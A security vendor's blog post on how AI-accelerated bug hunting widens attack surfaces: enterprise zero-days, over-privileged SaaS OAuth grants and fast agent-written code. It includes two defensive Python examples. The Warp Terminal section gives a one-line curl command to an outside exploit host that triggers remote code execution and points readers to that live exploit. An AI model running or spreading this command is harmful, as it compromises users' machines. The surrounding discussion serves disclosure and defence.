
The Attack Surface Is Everyone Now

June 9, 2026
6 min read

In the last two months, both Vercel and GitHub have announced security breaches, and I believe we’re going to see a lot more of this (unfortunately).

Just months after this tweet came critical CVEs from vendors like F5, Fortinet, Cisco, Palo Alto, OSS projects, etc. Our 2-person team alone, with the help of Hacktron and Claude, has uncovered numerous critical issues, which we will be disclosing in the coming days and weeks.


This is all fun until you reflect on the sheer speed at which vulnerabilities are being found. State-sponsored threat actors are in their prime right now: fully resourced, finding 0-days with AI, and planning the next big breach, and the target can be anyone or any org, quite literally.

One of the big limitations in security has always been talent and how niche it is. This is no longer true. I truly believe anyone with a reasonably good understanding of threat modeling software, who asks the right questions and has patience, can now hack! And the attack surfaces are only getting broader.

From a security point of view, the major implications I see are:

  • OSS / Enterprise Software
  • New SaaS products
  • Shipping fast

Let me try to briefly explain all three areas of concern and potential solutions. All three have the potential to cause a company-wide security incident.

OSS / Enterprise Software

A few years back, if you’d told me F5, Fortinet, Cisco, Palo Alto, and ImageMagick would all get popped in one month, I probably would’ve been very skeptical. Today, if someone tells me they got 2-3 crazy 0days in OSS / enterprise software this week, I’d believe it.

So what changed? AI is accelerating vuln research. You can now understand the architecture of an app, read code faster, and reverse binaries at insane speed.

When you give those powers to a team of threat actors, they go after widely used appliances and software like SSL VPNs, firewalls, and remote-access appliances to compromise your infrastructure. Or they go after your employees by targeting client software like Slack, Discord, Teams, and Zoom. I have already shown how easy it is to hack enterprise software now; see the BeyondTrust blog and the Palo Alto blog.

I was doing some cleanup of our Google Workspace recently and noticed an email client being used by one of my colleagues. Since this opened up a new attack surface for us, I asked him why he preferred the email client over Gmail web. The reason was simple: convenience.


The convenience vs security trade-off here is big. After about 2 hours of poking around with Claude, we had two findings on this email client:

  • One malicious email on the Windows client can potentially lead to RCE
  • On the Mac client, an email can potentially steal other emails, etc.

From a developer’s point of view, IDEs, terminals, and agentic flows will soon become attack surfaces, as we saw in the case of the GitHub hack, which was due to an IDE extension.

Take the example of Warp Terminal, a recently open-sourced agentic terminal. A few of my colleagues used it, so we ran a Hacktron scan on its open-source code and were able to find an RCE.

A chained exploit gives an attacker code execution on any machine running Warp with zero user interaction. The victim only has to let attacker-controlled bytes reach their terminal (e.g. curl rce.ee/warp-pwn.php, a poisoned log line, cat-ing a file). There are two independent paths to RCE, so the attack works whether or not Warp’s AI features are enabled.

For curious technical readers, it would be a good exercise to check out the April Warp git history and use the available exploit link to work out how the exploit works: rce.ee/warp-pwn.php.

Everyone’s POC’ing the new SaaS

People have always tried new apps that show up in their feed or come recommended by their peers. But in this age a vibe-coded product launches every day, some of the same type, some different: not just developer tools, but products for CRM, DevOps, and other areas.

Picture a vibe-coded SaaS being tried by lots of developers, with the SaaS taking elevated permissions to Google Workspace, cloud infra, or GitHub repos. They probably won’t even use this SaaS again, and they never revoke the grant. This creates another entry point into your org.

From Guillermo’s tweet regarding the Vercel breach: a Vercel employee got compromised through the breach of an AI platform called Context.ai. From there, the attacker got into Vercel environments.

Vercel might have vulnerabilities in their product. Every product does. But that’s not what got them. What got them was a developer connecting to a third-party AI SaaS that got pwned.

My guess is that Context.ai had escalated OAuth permissions on that dev’s account, which means whoever landed on Context.ai’s side inherited the same perms the dev had across Vercel’s customer environments. That’s the footgun.
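As an added illustration of the grant-hygiene problem described above (and of the "assume the SaaS is breached" rule later in the post), here is a small audit script written for this edit, not taken from Hacktron, Vercel or any vendor, that flags third-party OAuth grants carrying high-risk scopes or that have gone unused. The export format, app names, users and dates are constructed; a real run would feed it the grant list from your identity provider's admin API.

```python
import json
from datetime import datetime, timedelta, timezone

# Scopes that give a third-party app the same reach a compromised developer has.
# The Google scope URLs and GitHub scope names are real; the labels are ours.
HIGH_RISK_SCOPES = {
    "https://www.googleapis.com/auth/gmail.readonly": "read all mail",
    "https://mail.google.com/": "full mailbox access",
    "https://www.googleapis.com/auth/cloud-platform": "full GCP project access",
    "repo": "read/write every GitHub repo the user can reach",
    "admin:org": "manage GitHub org membership and settings",
}

# Constructed sample export, one record per (user, app) grant, and a fixed
# audit date so the run is reproducible.
GRANTS_EXPORT = json.dumps([
    {"user": "dev@example.com", "app": "ai-notes-demo", "scopes": [
        "https://www.googleapis.com/auth/gmail.readonly",
        "https://www.googleapis.com/auth/cloud-platform"],
     "last_used": "2026-03-01T00:00:00+00:00"},
    {"user": "dev@example.com", "app": "ci-bot-demo", "scopes": ["repo"],
     "last_used": "2026-06-08T17:30:00+00:00"},
    {"user": "pm@example.com", "app": "calendar-widget-demo", "scopes": [
        "https://www.googleapis.com/auth/calendar.readonly"],
     "last_used": "2026-01-10T08:00:00+00:00"},
    {"user": "pm@example.com", "app": "chat-login-demo", "scopes": [
        "https://www.googleapis.com/auth/userinfo.email"],
     "last_used": "2026-06-07T12:00:00+00:00"},
])
NOW = datetime(2026, 6, 9, tzinfo=timezone.utc)

def audit_grants(export_json, now, stale_days=30):
    """Return findings, 'revoke' first: unused grants are revoked, risky live ones reviewed."""
    findings = []
    for grant in json.loads(export_json):
        risky = [s for s in grant["scopes"] if s in HIGH_RISK_SCOPES]
        idle = now - datetime.fromisoformat(grant["last_used"])
        stale = idle > timedelta(days=stale_days)
        if not risky and not stale:
            continue  # low privilege and recently used: nothing to do
        reasons = [HIGH_RISK_SCOPES[s] for s in risky]
        if stale:
            reasons.append(f"unused for {idle.days} days")
        findings.append({"user": grant["user"], "app": grant["app"],
                         "action": "revoke" if stale else "review",
                         "reasons": reasons})
    return sorted(findings, key=lambda f: (f["action"] != "revoke", f["app"]))
if __name__ == "__main__":
    for f in audit_grants(GRANTS_EXPORT, NOW):
        print(f["action"].upper(), f["user"], f["app"], "; ".join(f["reasons"]))
```

The "review" bucket is where the Context.ai-style footgun lives: a grant that is still in use but carries far more scope than the integration needs.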

Teams are shipping fast

Agents are writing code and humans are reviewing less of it. Finding vulnerabilities at the shift-left stage was already hard; previous tools have not worked well, have always created noise, and have often let vulnerabilities slip to prod, only to be caught later by other means.

This is even more likely to happen now given how fast codebases are growing. In the time it takes you to review and understand one feature, 3 more are ready, and you just don’t have the team or the cognitive capacity to review tens of thousands of lines of code to find that one nasty bug.

Another thing about vulnerabilities is that they do not necessarily appear in the changed code; they can appear in an entirely different area of the codebase, or in another codebase altogether, just because one function’s signature changes a default from false to true.
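One way to pin that kind of default down, as an added example that is not from the post or from Hacktron: a security-sensitive default lives in one module, a caller elsewhere silently depends on it, and a small signature-contract check run in CI catches the flip before it ships. The `fetch`, `deliver_webhook` and `fetch_relaxed` functions are constructed for the illustration and make no network calls.

```python
import inspect
import ipaddress
from urllib.parse import urlparse

def _is_private_host(host):
    """True for loopback/link-local/RFC1918 literals and 'localhost' (constructed check)."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return host == "localhost"

# http_client.py (illustrative): the secure default is allow_private=False.
def fetch(url, allow_private=False):
    host = urlparse(url).hostname or ""
    if not allow_private and _is_private_host(host):
        raise ValueError(f"blocked request to private host {host!r}")
    return f"GET {url}"  # stand-in for the real request

# webhooks.py (illustrative, a different module): never passes allow_private,
# so its SSRF protection is entirely inherited from fetch's default.
def deliver_webhook(url):
    return fetch(url)

# The post-refactor signature: one flipped default, and any caller shaped like
# deliver_webhook is now SSRF-able without a single line of its own changing.
def fetch_relaxed(url, allow_private=True):
    return fetch(url, allow_private)

# Contract: function -> parameter -> the default it must keep. Checked in CI.
SECURITY_DEFAULTS = {fetch: {"allow_private": False}}

def check_security_defaults(contracts):
    """Return (function, parameter, actual default) for every drifted default."""
    violations = []
    for func, expected in contracts.items():
        params = inspect.signature(func).parameters
        for name, want in expected.items():
            got = params[name].default if name in params else inspect.Parameter.empty
            if got is not want:  # a removed parameter counts as drift too
                violations.append((func.__name__, name, got))
    return violations
```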

On the other hand, business-wise, it is necessary for teams to ship fast; otherwise, competitors are going to get ahead.

Even at Hacktron, when a client asks for a feature we try our best to ship it asap, and that means sometimes agents are gonna slip in vulnerabilities.

Real-time PR review is how we catch these at Hacktron with our code review solution.


How can you position yourself better?

If you ask me, there’s one rule you should try to practice: assume breach.

Assume the sandbox where you’re executing commands is going to get breached, so build a better sandbox. Assume the user will escape the sandbox, so the outer infra should adopt roles and network rules with that threat model in mind.

The same logic applies to third parties. Assume the SaaS you’re giving access to is going to get breached. Would you still give them Gmail read access? Assume your Slack workspace or your local machine is going to get hacked. Would you still have production keys sitting in chat?

If you’re a security team sitting between fast-shipping product teams and production, this is the problem we built Hacktron Review to solve. Start a trial.